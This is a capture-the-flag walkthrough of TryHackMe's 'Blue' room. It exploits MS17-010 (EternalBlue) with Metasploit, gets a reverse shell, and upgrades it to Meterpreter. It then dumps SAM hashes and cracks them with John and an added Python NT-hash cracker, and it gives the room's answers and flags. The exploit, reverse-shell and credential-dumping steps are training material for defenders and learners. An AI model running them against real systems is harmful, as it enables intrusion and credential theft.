Room Overview: Blue is a beginner-friendly TryHackMe room focused on Windows exploitation. This room teaches the fundamentals of exploiting the infamous MS17-010 EternalBlue vulnerability using Metasploit, privilege escalation techniques, password hash cracking, and basic post-exploitation activities.
Skills Required: Basic Linux command line knowledge, understanding of Nmap, familiarity with Metasploit framework
Skills Learned: Windows SMB exploitation, Metasploit usage, shell upgrading, privilege escalation, password hash dumping and cracking
Task 1: Reconnaissance
The first step in any penetration test is reconnaissance. We need to identify what services are running on the target machine and discover potential vulnerabilities.
Port Scanning
Let's start by scanning for open ports under 1000:
nmap -p 1-999 10.10.165.91
Question: How many ports are open with a port number under 1000?
Answer: 3
Vulnerability Detection
Port 445 (SMB) is open. SMB on unpatched Windows hosts is a common entry point, so check whether this one is missing the MS17-010 patch (EternalBlue) with the dedicated NSE script:
nmap -p 445 --script=smb-vuln-ms17-010 10.10.165.91
Question: What is this machine vulnerable to?
Answer: ms17-010
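Scanning by hand answers both questions, but on a larger engagement you want the same triage from nmap's machine-readable output. The script below is an added example written for this page, not part of the room or the TryHackMe material: it reads nmap's -oX report, counts open TCP ports below 1000 and pulls out the smb-vuln-ms17-010 verdict. The embedded report is constructed to resemble the Blue target (three open ports under 1000 plus RDP), the element layout follows nmap's XML output as I understand it, and the CVE-2017-0143 table key is an assumption about how the script labels its result.

```python
"""Triage an nmap XML report: count open TCP ports below 1000 and report the
smb-vuln-ms17-010 verdict. Produce the input with -oX, for example:
    nmap -p 1-999 -oX ports.xml 10.10.165.91
    nmap -p 445 --script=smb-vuln-ms17-010 -oX smb.xml 10.10.165.91
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample report (not real scan output). The port/state/script
# layout mirrors nmap's -oX format (assumption); the CVE-2017-0143 table key
# is assumed to be the one the NSE script uses.
SAMPLE_XML = """
<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="10.10.165.91" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/>
        <script id="smb-vuln-ms17-010" output="VULNERABLE">
          <table key="CVE-2017-0143">
            <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
            <elem key="state">VULNERABLE</elem>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/></port>
    </ports>
  </host>
</nmaprun>
""".strip()


def open_tcp_ports(xml_text):
    """Return the sorted list of TCP ports nmap reported as open."""
    root = ET.fromstring(xml_text)
    ports = []
    for port in root.iter("port"):
        state = port.find("state")
        if port.get("protocol") == "tcp" and state is not None and state.get("state") == "open":
            ports.append(int(port.get("portid")))
    return sorted(ports)


def count_open_below(xml_text, limit=1000):
    """Answer 'how many ports are open under <limit>'."""
    return sum(1 for p in open_tcp_ports(xml_text) if p < limit)


def ms17_010_state(xml_text):
    """Return the NSE 'state' value for smb-vuln-ms17-010 (e.g. VULNERABLE),
    or None if the script produced no output for any port."""
    root = ET.fromstring(xml_text)
    for script in root.iter("script"):
        if script.get("id") != "smb-vuln-ms17-010":
            continue
        for elem in script.iter("elem"):
            if elem.get("key") == "state":
                return elem.text
        # Older reports carry only the free-text output attribute.
        return script.get("output", "").strip() or "UNKNOWN"
    return None


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    print("open TCP ports:", open_tcp_ports(text))
    print("open ports under 1000:", count_open_below(text))
    print("ms17-010:", ms17_010_state(text))
```

Run it with the path to a real -oX file as the first argument, or with no argument to see the constructed sample; the answers it prints for the sample (3 ports, VULNERABLE) match the room's.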
What is EternalBlue?
MS17-010 is the March 2017 Microsoft security bulletin that patched a set of flaws in the SMBv1 server implementation (CVE-2017-0143 through CVE-2017-0148); EternalBlue is the exploit for one of them (CVE-2017-0144) and gives an unauthenticated attacker remote code execution as SYSTEM. Developed by the NSA and leaked by the Shadow Brokers in April 2017, it was used a month later by the WannaCry ransomware worm and then by NotPetya.
Task 2: Gaining Access
Now that we've confirmed the target is vulnerable to EternalBlue, let's exploit it using Metasploit.
Starting Metasploit
msfconsole
Finding the Exploit
Search for the EternalBlue exploit module:
search ms17_010
Question: What is the full path of the exploitation code?
Answer: exploit/windows/smb/ms17_010_eternalblue
Configuring the Exploit
Select the exploit and view its options:
use exploit/windows/smb/ms17_010_eternalblue
show options
Question: What is the name of the required value we need to set?
Answer: RHOSTS
Configure the exploit with the target IP and a 64-bit staged shell payload, then run it. Check show options first: LHOST must be an address the target can reach back, which is your tun0 VPN address if you connect from your own machine rather than the AttackBox.
set RHOSTS 10.10.165.91
set payload windows/x64/shell/reverse_tcp
run
If successful, you receive a command shell running as NT AUTHORITY\SYSTEM. The exploit is not always reliable on the first attempt, so rerun it if the target does not call back. Background the shell with CTRL + Z (confirm with y) for the next steps.
Task 3: Privilege Escalation
While we have a shell, we need to upgrade it to a Meterpreter session for better functionality and then ensure we have SYSTEM-level privileges.
Converting Shell to Meterpreter
Question: What post module do we use to convert a shell to Meterpreter?
Answer: post/multi/manage/shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options
Question: Which option are we required to change?
Answer: SESSION
Set the session ID (use sessions -l to list active sessions) and LHOST, the address the new Meterpreter stage connects back to; it must be your VPN (tun0) address, not a LAN interface:
set SESSION 1
set LHOST [Your AttackBox IP]
run
Interacting with Meterpreter
Once the conversion completes, interact with the new Meterpreter session (its number is printed when it opens; with the shell as session 1 it is normally 2):
sessions -i 2
Verifying System Privileges
Drop to a system shell and check who you are; the EternalBlue exploit should have landed you as NT AUTHORITY\SYSTEM (if it did not, return to Meterpreter and run getsystem):
shell
whoami
Exit the shell and return to Meterpreter:
exit
Process Migration
For stability, migrate into a long-lived process that also runs as SYSTEM:
ps
Look for a process running as NT AUTHORITY\SYSTEM with the same architecture as the target (x64), such as services.exe. Avoid lsass.exe: if migration crashes it, Windows reboots the host and you lose the session. Note the PID and migrate:
migrate [PID]
Note: Migration can fail or kill the session. If it does, try a different process or re-exploit the machine.
Task 4: Credential Dumping and Cracking
Now that we have SYSTEM privileges, we can dump password hashes from the SAM database.
Dumping Password Hashes
hashdump
Each output line has the form user:RID:LM hash:NT hash:::. The LM field reads aad3b435b51404eeaad3b435b51404ee when no LM hash is stored, and the NT hash is the value you crack. Built-in accounts have RIDs below 1000 (Administrator is 500, Guest is 501); a user created after installation gets RID 1000 or above, so look for that.
Question: What is the name of the non-default user?
Answer: Jon
Cracking the Hash with John the Ripper
Copy Jon's NT hash (the fourth colon-separated field) into a file called hash.txt on your AttackBox and run John against it with the rockyou wordlist:
echo "Jon:[hash_value]" > hash.txt
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Once cracked, view the password:
john --show hash.txt
Question: What is the cracked password?
Answer: alqfna22
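To make clear what john --format=NT is doing with that hash, here is an added example written for this page (not the room's own material): it parses hashdump output, separates built-in accounts from created ones by RID, and runs a wordlist attack by computing NT hashes, which are MD4 over the UTF-16LE encoded password. The hashdump lines and the wordlist are constructed, not the target's real data; Jon's sample hash is generated from the room's answer inside the script, while the Administrator line carries the well-known NT hash of "password". MD4 is implemented inline from RFC 1320 because hashlib's md4 is unavailable on OpenSSL 3 builds.

```python
"""Parse Meterpreter hashdump output, pick out non-default accounts and run a
wordlist attack on their NT hashes (MD4 over UTF-16LE password)."""
import struct

MASK = 0xFFFFFFFF
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (pure Python; hashlib's md4 is often disabled)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    rounds = (  # (round function, additive constant, X index order, shift table)
        (lambda x, y, z: (x & y) | (~x & z), 0, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = [a, b, c, d]
        for func, const, order, shifts in rounds:
            for i in range(16):
                ai, bi, ci, di = ((j - i) % 4 for j in range(4))  # rotate (a,b,c,d)
                v[ai] = _rotl((v[ai] + func(v[bi], v[ci], v[di]) + x[order[i]] + const) & MASK,
                              shifts[i % 4])
        a, b, c, d = ((s + t) & MASK for s, t in zip((a, b, c, d), v))
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash as stored in the SAM: MD4 of the UTF-16LE password, hex encoded."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str):
    """hashdump lines look like user:RID:LM:NT:::; return (user, rid, nt) tuples."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and parts[1].isdigit():
            rows.append((parts[0], int(parts[1]), parts[3].lower()))
    return rows


def non_default_users(rows):
    """Built-in accounts use RIDs below 1000; created accounts start at 1000."""
    return [r for r in rows if r[1] >= 1000]


def crack(rows, wordlist):
    """Dictionary attack: hash each candidate once and look it up against every target."""
    targets = {}
    for user, _, nt in rows:
        targets.setdefault(nt, []).append(user)
    found = {}
    for word in wordlist:
        for user in targets.get(nt_hash(word), []):
            found[user] = word
    return found


# Constructed sample hashdump (not the target's real data). The Administrator
# NT hash is the well-known hash of "password"; Jon's is computed here from the
# room's answer.
SAMPLE_HASHDUMP = "\n".join([
    "Administrator:500:%s:8846f7eaee8fb117ad06bdd830b7586c:::" % LM_EMPTY,
    "Guest:501:%s:31d6cfe0d16ae931b73c59d7e0c089c0:::" % LM_EMPTY,  # empty password
    "Jon:1000:%s:%s:::" % (LM_EMPTY, nt_hash("alqfna22")),
])
SAMPLE_WORDLIST = ["123456", "letmein", "alqfna22", "password"]  # constructed

if __name__ == "__main__":
    rows = parse_hashdump(SAMPLE_HASHDUMP)
    for user, rid, nt in non_default_users(rows):
        print("non-default user: %s (RID %d) NT=%s" % (user, rid, nt))
    print("cracked:", crack(rows, SAMPLE_WORDLIST))
```

Feed a real hashdump to parse_hashdump and rockyou.txt (one word per line) to crack to reproduce what John does, minus its speed: the point is that NT hashes are unsalted, so one MD4 per candidate tests every account at once.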
Task 5: Flag Hunting
Time to find the three flags hidden on the system. These flags represent key locations in the Windows file system.
Flag 1 - System Root
The first flag is at the root of the system drive. In Meterpreter, backslashes in paths are doubled:
cd C:\\
cat flag1.txt
Answer: flag{access_the_machine}
Flag 2 - Password Storage Location
This flag sits where Windows stores the SAM database, C:\Windows\System32\config. Meterpreter's search prints the full path if you are unsure:
search -f flag2.txt
cd C:\\Windows\\System32\\config
cat flag2.txt
Answer: flag{sam_database_elevated_access}
Errata: Windows sometimes deletes this flag. If you can't find it, you may need to restart the machine and re-exploit.
Flag 3 - Administrator Documents
The final flag is in the Documents folder of Jon, the machine's administrator account, a place where privileged users typically keep important files. Use the absolute path, since the previous step left you in the config directory:
cd C:\\Users\\Jon\\Documents
cat flag3.txt
Answer: flag{admin_documents_can_be_valuable}
Conclusion
Congratulations! You've successfully completed the Blue room. This walkthrough demonstrated several critical penetration testing skills:
- Network reconnaissance with Nmap
- Vulnerability identification using NSE scripts
- Exploiting the infamous EternalBlue vulnerability
- Upgrading shells to Meterpreter for enhanced functionality
- Privilege escalation and process migration
- Credential dumping and password cracking
- Post-exploitation file system navigation and searching with Meterpreter
The EternalBlue vulnerability, while patched years ago, remains relevant in penetration testing as many legacy systems remain unpatched. Understanding how these exploits work is crucial for both offensive and defensive security professionals.
Next Steps: If you enjoyed this room, check out the sequel rooms "Ice" and "Blaster" on TryHackMe for more Windows exploitation practice.
[ SYSTEM COMPROMISED ] - [ HASHES CRACKED ] - [ FLAGS CAPTURED ]